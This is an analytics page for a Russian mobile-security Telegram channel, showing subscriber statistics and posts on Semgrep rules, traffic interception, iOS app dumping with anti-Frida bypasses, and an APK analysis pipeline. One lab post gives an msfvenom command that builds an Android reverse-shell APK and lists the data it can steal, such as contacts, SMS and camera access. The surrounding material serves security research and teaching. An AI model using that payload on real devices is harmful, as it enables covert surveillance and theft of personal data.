Дневник Комбеза
Ir al canal en Telegram
История одного Кибер Безопасника из маленького города в Сибири
Mostrar másEl país no está especificadoLa categoría no está especificada
688
Suscriptores
Sin datos24 horas
+107 días
+6430 días
Carga de datos en curso...
Canales Similares
Sin datos
¿Algún problema? Por favor, actualice la página o contacte a nuestro gerente de soporte.
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
julio '26
julio '26
+76
en 2 canales
junio '26
+48
en 1 canales
Get PRO
mayo '26
+21
en 0 canales
Get PRO
abril '26
+66
en 0 canales
Get PRO
marzo '26
+69
en 0 canales
Get PRO
febrero '26
+28
en 1 canales
Get PRO
enero '26
+15
en 0 canales
Get PRO
diciembre '25
+12
en 0 canales
Get PRO
noviembre '25
+24
en 0 canales
Get PRO
octubre '25
+19
en 2 canales
Get PRO
septiembre '25
+194
en 2 canales
Get PRO
agosto '250
en 0 canales
Get PRO
julio '25
+46
en 0 canales
Get PRO
junio '250
en 1 canales
Get PRO
mayo '25
+148
en 1 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 29 julio | +5 | |||
| 28 julio | 0 | |||
| 27 julio | +1 | |||
| 26 julio | +1 | |||
| 25 julio | +3 | |||
| 24 julio | 0 | |||
| 23 julio | +4 | |||
| 22 julio | +4 | |||
| 21 julio | +4 | |||
| 20 julio | +7 | |||
| 19 julio | +5 | |||
| 18 julio | +21 | |||
| 17 julio | +3 | |||
| 16 julio | +6 | |||
| 15 julio | 0 | |||
| 14 julio | +4 | |||
| 13 julio | +1 | |||
| 12 julio | +2 | |||
| 11 julio | +1 | |||
| 10 julio | 0 | |||
| 09 julio | 0 | |||
| 08 julio | +1 | |||
| 07 julio | +1 | |||
| 06 julio | 0 | |||
| 05 julio | 0 | |||
| 04 julio | 0 | |||
| 03 julio | +1 | |||
| 02 julio | +1 | |||
| 01 julio | 0 |
Publicaciones del Canal
Semgrep Rules
Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый.
А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞
Поэтому мы решили собрать всё это в одном месте и создали репозиторий:
https://github.com/Sib-Coder/semgrep-mobile-rules
В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов.
Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория.
Давайте делать мобилки безопаснее вместе 😎
| 2 | Sin texto... | 0 |
| 3 | Пост для тех кто не боится
Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?»
Сегодня практическая работа именно для таких людей.
Вам понадобится:
- телефон;
- Metasploit;
- сеть с нормальной маршрутизацией;
- навыки реверса APK — уровня детского сада достаточно.
Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд:
bash
msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk
Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его.
Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга.
Дальше — msfconsole, запускаем приложение на телефоне.
В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона:
- список контактов;
- SMS — даже отправить можно: я так кинул денег другу за шаурму;
- скриншоты;
- доступ к камере;
- ...
Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя.
Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :) | 761 |
| 4 | Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂 | 548 |
| 5 | Нигде не безопасно.
Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах.
Кто дочитает до конца:
1 - преисполнится
2 - найдёт практический чек-лист
3 - список дополнительной литературы для погружения
#AppSec #Pentest
🧠 Кибер ПТУ | 👨🏫 Менторство ИБ
📂 Другие каналы | 556 |
| 6 | +1 Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему»
Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе.
Главная мысль, которую я вынес:
процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу.
Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков.
И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности.
Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя».
В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных.
Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес... | 885 |
| 7 | Android SELinux Internals Part II: домены, отказы, обходы
Ребята из 8ksec наконец-то выпустили вторую часть серии про SELinux на Android!
Первая часть была про основы: контексты, чтение политик, sepolicy-inject. Вторая уже про то, как это всё работает в реальности.
Разбирается вся цепочка от сертификата подписи APK до SELinux-домена, роль Zygote, как работает installd.
Добавили практики: chcon, runcon, как работает magiskpolicy под капотом, чем принципиально отличаются подходы Magisk, KernelSU и APatch.
Очень сочная и большая статья для любителей мякотки и чтоб погрузиться поглубже в то, как и что устроено внутри.
Ну и анонсированная третья часть обещает быть ещё интереснее: kernel-level техники отключения SELinux и разбор реальных CVE. Что сказать, ждем :)
#Android #SELinux #Pentest #Research #Kernel #Tools | 462 |
| 8 | Сраный Burp…
Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходит и какие API дёргает, всё равно надо.
Мы с коллегой пентестили Flutter-приложение, и мне досталась iOS-часть. А это значит: pinning, сертификаты, прокси, VPN и немного боли.
Сначала собрали схему через Burp:
iPhone → OpenVPN → iptables DNAT → Burp → интернет
Трафик заворачивался, tcpdump показывал, что пакеты доходят, сертификаты подменялись, curl проходил. Но трафик не отображался...
После часа дебага стало понятно: проблема не в OpenVPN, не в iptables и не в маршрутах. Просто Burp опять решил пожить своей жизнью и периодически не прогонял через себя весь трафик.
В итоге переехали на более простую схему:
iPhone → OpenVPN → iptables REDIRECT → mitmproxy → WireGuard → интернет
Поднял mitmweb прямо на OpenVPN-сервере, завернул 80/443 с iPhone локально на 8080, а сам сервер выпустили наружу через wg0.
Понятно что после этого надо было бы похукать пару функций через frida, но в этот раз повезло и разрабы не заморачивались.
Схему, как собрать такое окружение, приложу ниже. Кстати этот метод работает на многих приложениях так как мало кто научился от него нормально защищаться. | 514 |
| 9 | iDump: замена frida-ios-dump без Python (но с блекджеком и обходами)
Если кому-то нужно было когда-нибудь сдампить приложение с iOS трубки, то первое, что приходит на ум - классический frida-ios-dump.
Но с Frida 17+ он сломался и, судя по всему, уже не починится. И вот появился iDump - переосмысление того же подхода, но без всей той боли с pip, зависимостями, правильное версией Python и тд
Автор этого шикарного тула - широко известный в узких кругах @OxFi5t, спасибо ему за это!
Написан на Go с использованием frida-go, и главная идея это автономность. Один самодостаточный бинарь, который уже содержит в себе Frida-агент. Скопировал в PATH и работает. Техника та же, что у оригинала: инжектим агент, патчим cryptid, вытаскиваем расшифрованные сегменты Mach-O, собираем валидный IPA. Только без лишних телодвижений 🤓
Из приятного:
- поддержка батч-дампинга (можно сразу несколько приложений или вообще `--dump-all`)
- фильтрация по bundle ID
- пропуск системных приложений Apple
Передача файлов идёт через Frida messages напрямую — SSH не нужен (хотя SSH/SFTP режим тоже есть, если USB-трансфер медленный).
Отдельно порадовал флаг --dodge - встроенный bypass для приложений, которые детектят Frida и падают до того, как агент успевает что-то сделать. Есть базовый вариант (хукает libc-символы: ptrace, sysctl и тд) и --dodge=advanced для особо упоротых приложений, которые делают raw syscalls и сканируют память на Frida-сигнатуры. Ну и возможность передать свой bypass-скрипт через --early, если встроенные не справляются.
Так что тут можно еще и идеи по обходу джейлбрейка/фриды подсмотреть 😉
Очень рекомендую попробовать. Как по мне, давно нужна была нормальная замена 🔥
#iOS #Frida #ReverseEngineering #Tools #iDump | 446 |
| 10 | Я окончательно перестал играть в CTF.
Причин, наверное, несколько. Последние полгода я постепенно отключался от этого процесса и переключался на вещи, которые сейчас кажутся мне более интересными и полезными.
Для меня CTF всё ещё остаётся офигенным форматом практики. Особенно в обучении: когда мы разрабатываем курсы, тренинги или внутренние соревнования, CTF-задачи отлично помогают закреплять навыки руками.
Но вот участвовать в CTF как игрок на постоянной основе мне больше не хочется.
Проблема не в том, что формат плохой. Проблема в том, что многие соревнования, на мой взгляд, потеряли прежний шарм. Всё чаще игра превращается не в «думай, ломай, проверяй гипотезы», а в распинывание агента.
Да, можно играть без Codex, Claude и всего остального зоопарка AI-инструментов.
Можно.
Но зачем?
Если таски пишутся с помощью ИИ, решаются с помощью ИИ, а эксплойты подбираются за секунды, то игра без ИИ превращается просто в добровольную потерю 80% силы.
А ведь раньше весь кайф CTF был как раз в другом.
Ты сидишь, тупишь, скрипишь мозгами, пробуешь странные идеи, проваливаешься, снова пробуешь — и в какой-то момент сам приходишь к решению. Вот это чувство и было главным.
А сейчас всё чаще выглядит так:
«Codex, тут сайт, походу SSTI вот в этом месте»
Через несколько секунд: готовый эксплойт.
В 2021 году я кайфовал от каждого решённого таска. От каждого маленького продвижения. От момента, когда после нескольких часов тупняка что-то наконец сходилось, и ты такой: «А, вот оно».
Сейчас этого ощущения стало сильно меньше.
Наверное, просто стало неинтересно играть в игру, где всё чаще соревнуются не люди, а их агенты. | 539 |
| 11 | Мой пайплайн по анализу андроид приложений:
Stage 0 — APK Metadata (apk-info):
Мгновенный парсинг (~2мс) манифеста без декомпиляции: пакет, SDK-версии, все permissions, exported-компоненты, подписи (v1/v2/v3), security profile. Уже на этом этапе детектит: debuggable-флаг, v1-only подпись (уязвимость Janus, CVE-2017-13156), привилегированные системные permissions, exported ContentProvider'ы без защиты.
Stage 1 — Декомпиляция + сканирование APK (параллельно):
Всё запускается одновременно:
• JADX — декомпиляция DEX → Java (8 потоков, 60-180с)
• apktool — распаковка ресурсов, AndroidManifest.xml, нативных .so библиотек (5-15с)
• dexfinder — поиск использования скрытых Android API + трассировка цепочек вызовов
• Mariana Trench — taint-анализ потоков данных от Meta (source→sink)
• Trueseeing — Dalvik bytecode scanner
• Автодетект Flutter → Blutter (реверс Dart-кода), React Native → декомпиляция Hermes
Stage 2 — Статический анализ (параллельно):
• 184 regex-правила — быстрый pattern matching по декомпилированным исходникам
• 331 semgrep-правило — AST-анализ (taint tracking, data flow)
• Анализ Blutter pp.txt (Dart-символы для Flutter-приложений)
• dexfinder call chain tracing — трассировка цепочек вызовов от exported-компонентов к уязвимым методам
Stage 3 — Merge + фильтрация + обогащение:
• Дедупликация по (rule_id, file, line)
• SDK-фильтр (732 паттерна) — убирает 98% шума от Google, Firebase, OkHttp, Retrofit и ещё 150+ SDK
• Классификация severity через RoBERTa модель
• Аннотация exported-статуса: кросс-проверка finding → AndroidManifest → dexfinder reachability
• RAG-обогащение каждого finding контекстом из базы знаний
Stage 4 — LLM-анализ (6 агентов параллельно):
Каждый агент — специалист в своей области, получает только релевантные findings + RAG-контекст:
• Agent 1: Manifest + Attack Surface
• Agent 2: Network + TLS
• Agent 3: Auth + Cryptography
• Agent 4: WebView + JS Bridge
• Agent 5: Business Logic
• Agent 6: Native Libraries
• Agent 7 (Judge): валидирует CRITICAL/HIGH от всех агентов, отсекает false positives
RAG Knowledge Base:
• 9675 chunks в ChromaDB (гибридный поиск: BM25 + vector + RRF)
• 1547+ отчётов из 18 источников:
— OWASP MASTG: 120 (тестовые процедуры с примерами кода)
— HackerOne: 170 (реальные bug bounty отчёты с PoC)
— MITRE ATT&CK Mobile: 124 (техники атак, детекция, митигации)
— Security blogs: 207 (Google, Zimperium, Lookout, Check Point)
— Samsung Bulletins: 111 (Samsung-specific CVE)
— NVD: 250 (CVE с CVSS)
— Exploit-DB: 50
— Android Bulletins: 34
— CISA KEV: 23
— Собственные аудиты: 144
— Прочие: arXiv, VulCorpus (94 OWASP Top-10 сэмплов)
• Граф знаний: 5597 узлов, 9213 связей (CVE↔️CWE↔️MITRE↔️MASTG)
• 970+ code snippets в отдельном индексе | 505 |
